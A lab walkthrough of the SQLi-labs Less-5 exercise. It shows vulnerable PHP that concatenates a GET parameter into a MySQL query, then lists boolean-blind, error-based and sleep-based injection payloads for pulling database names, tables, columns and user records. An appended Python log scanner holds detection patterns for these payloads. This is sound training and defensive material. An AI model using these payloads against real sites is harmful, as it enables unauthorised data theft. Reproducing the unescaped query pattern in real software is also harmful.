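Less-5 (Double Injection, GET, single-quote string injection: error-based and time-based injection)
Blind injection
Blind injection (Blind SQL Injection) comes in three forms:
Boolean-based blind SQL injection
Time-based blind SQL injection
Error-based blind SQL injection
Core code (it never returns data from the database):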
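    // Enclosing block implied by the closing brace and else at the end of the snippet
    if(isset($_GET['id']))
    {
    $id=$_GET['id'];
    // $id is concatenated into the query unescaped: this is the injection point
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
        if($row)
        {
        // A row was found: only a fixed message is shown, never the row itself
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
        }
        else
        {
        // No row: the raw MySQL error is printed, which is the error-based channel
        echo '<font size="3" color="#FFFF00">';
        print_r(mysql_error());
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
        }
    }
    else { echo "Please input the ID as parameter with numeric value";}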
Method 1: boolean-based blind injection

1. Probe the version number (the payload calls version(), which returns the MySQL server version)
    id=1' and left(version(),1)=5%23

2. Probe the length of the database name
    id=1' and length(database())=8%23
Probe the database name (binary search)
    id=1' and left(database(),1)>'a'%23
    id=1' and left(database(),1)='s'%23
    id=1' and left(database(),2)>'se'%23
    id=1' and left(database(),2)='se'%23
    id=1' and left(database(),3)>'sec'%23
    id=1' and left(database(),3)='sec'%23
    ........
    id=1' and left(database(),8)='security'%23

3. Get the table names
Try with the substr() and ascii() functions
    id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>82%23
    id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101%23
    id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109%23
    ...
Testing step by step gives the table name: email
To get the second table, change the value after limit; the second table is limit 1,1
    id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=113%23

4. Get the columns of the users table
Use regexp
Use regexp to check whether there is a us** column
    id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)--+'
Use regexp to check whether there is a column starting with username
    id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+

5. Get the contents of a column
Use the ord() and mid() functions to read the contents of the users table
IFNULL() checks whether the first expression is NULL; if it is, it returns the second expression, otherwise the first
CAST() converts a value from one type to another
    id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>68--+
    id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+
    id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>68--+
    id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),2,1))=68--+
The value finally extracted is Dumb
Method 2: error-based injection
    id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

Error-based injection using a numeric value that is out of range
    id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

Error-based injection using bigint overflow
    id=1' union select (!(select * from (select user())x) - ~0),2,3--+

Error-based injection using the xpath functions
    id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+

    id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+

Using duplicated data
    id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+
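Method 3: sleep (time-delay) injection
Sleep injection is another form of blind injection. Unlike boolean injection, it produces no error output, and the page returns the same state whether the condition is true or false.
The attacker cannot tell from the page state whether an injected SQL test statement was correct. The only option is to construct SQL test statements that use sleep and infer what is stored in the database from the page's response time.
Determine whether time-delay injection is possible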
    ' and sleep(5)--+
Extract the length of the database name
    ' and if(length(database())=8,sleep(5),1)--+
Extract the database name
    ' and if(ascii(substr(database(),1,1))>5,sleep(5),1)--+
OR
    ' and if(left(database(),1)='s',sleep(5),1)--+
Determine the number of tables in the database
    ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+
Extract a table name
    ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1)--+
OR
    ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
    ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='e' --+
Determine the number of columns
    ' and if((select count(*) from information_schema.columns where table_name='users')>1,sleep(5),1)--+
Determine a column name
    ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+
Extract the data in a column
    ' and left((select password from users limit 0,1),1)='D' --+
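Seen from the defending side, all three methods above leave recognisable query strings in the web server log. The following is an added example, not part of the original post: a Python scanner that tags requests by payload family and marks a client whose sleep() request took at least the requested delay, meaning the injection actually executed. The log layout, the names classify, scan and SAMPLE_LOG, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Signatures cover only the payload families listed on this page.
SIGNATURES = {
    "boolean": re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|mid)\s*\(|\bleft\s*\(|\blength\s*\(\s*database\s*\(", re.I),
    "error": re.compile(r"\b(?:extractvalue|updatexml|name_const)\s*\(|\bfloor\s*\(\s*rand\s*\(|\bexp\s*\(\s*~", re.I),
    "time": re.compile(r"\bsleep\s*\(\s*(\d+)", re.I),
    "schema": re.compile(r"\binformation_schema\.", re.I),
}
# Assumed log layout: client, quoted request line, status, request time (seconds).
LOG_LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')

def classify(raw_query):
    """Return (matched tags, requested sleep seconds or None) for an encoded query."""
    decoded = unquote_plus(raw_query)  # %27 -> ', %23 -> #, + -> space
    tags = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
    m = SIGNATURES["time"].search(decoded)
    return tags, (int(m.group(1)) if m else None)

def scan(lines, min_hits=3):
    """Per client: matching requests, tags seen, whether a SLEEP() ran.
    Blind extraction needs many requests, so min_hits drops one-off matches."""
    hits = defaultdict(lambda: {"requests": 0, "tags": set(), "sleep_executed": False})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target, _status, elapsed = m.groups()
        tags, sleep_s = classify(urlsplit(target).query)
        if not tags:
            continue
        entry = hits[client]
        entry["requests"] += 1
        entry["tags"] |= tags
        # Response time >= requested delay: the injected SLEEP() executed, so the
        # parameter is injectable rather than merely probed.
        if sleep_s and float(elapsed) >= sleep_s:
            entry["sleep_executed"] = True
    return {c: e for c, e in hits.items() if e["requests"] >= min_hits}

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /Less-5/?id=1%27+and+length(database())=8%23 HTTP/1.1" 200 0.004',
    '203.0.113.7 "GET /Less-5/?id=1%27+and+extractvalue(1,concat(0x7e,(select+@@version),0x7e))--+ HTTP/1.1" 200 0.005',
    '203.0.113.7 "GET /Less-5/?id=1%27+and+if(length(database())=8,sleep(5),1)--+ HTTP/1.1" 200 5.012',
    '198.51.100.9 "GET /Less-5/?id=1 HTTP/1.1" 200 0.003',
]
```

A match only shows that a payload was sent; the sleep_executed flag is the part that indicates the parameter is really injectable and the query needs to be moved to a parameterized statement.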
Appendix: ASCII conversion: https://www.qqxiuzi.cn/bianma/ascii.htm
References: https://www.cnblogs.com/lcamry/articles/5717442.html
https://www.cnblogs.com/lcamry/p/6122257.html